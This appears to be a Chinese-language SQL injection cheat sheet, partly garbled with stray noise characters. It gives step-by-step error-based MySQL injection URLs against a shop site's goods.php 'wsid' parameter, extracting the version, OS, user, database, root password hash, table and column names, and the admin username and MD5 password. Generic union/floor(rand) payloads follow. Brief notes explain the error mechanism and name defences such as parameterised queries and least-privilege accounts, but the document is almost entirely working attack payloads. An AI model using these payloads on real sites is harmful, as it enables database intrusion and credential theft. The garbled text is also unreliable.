判断版本号
- [0 `# V0 U+ ^4 R* Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 L4 P0 o- k1 k! E5 I1 ?
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 g7 k4 a- k) h0 D
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
7 p+ x; L' t' k; i Q2 Bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash（该查询读取 mysql.user；如果应用使用的数据库账号能读到这张表，说明账号权限过大，应改用只授予业务库所需权限的账号）
, M7 I# y7 d. T0 n V1 i7 H5 ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 ^7 E3 l9 r/ m+ A) B
当前 数据库表名
, U! w7 c9 S. x% Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 K, A5 a. K, N, c' S+ s8 V8 z
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5)
# ?2 L. f/ V( shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
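报错注射（报错注入）：以下语句与上面各 URL 原理相同，都是让 group by 在对 concat(查询结果, floor(rand()*2)) 分组时产生重复键错误，从而把子查询结果带进 MySQL 的报错信息里。防御上应使用参数化查询（对 wsid、uid 这类看起来是数字的参数做严格的整数校验），并且不要把数据库错误信息回显给客户端。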
! b. \7 x M. {' [SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 F* I) S- r4 D, \
3 |$ }( z3 p, q) b' h! q; X- c, S9 PSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
& S3 ^6 V8 Q" {- v* A/ n1 t6 P+ v% P7 c5 y' R' d6 Y! n
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |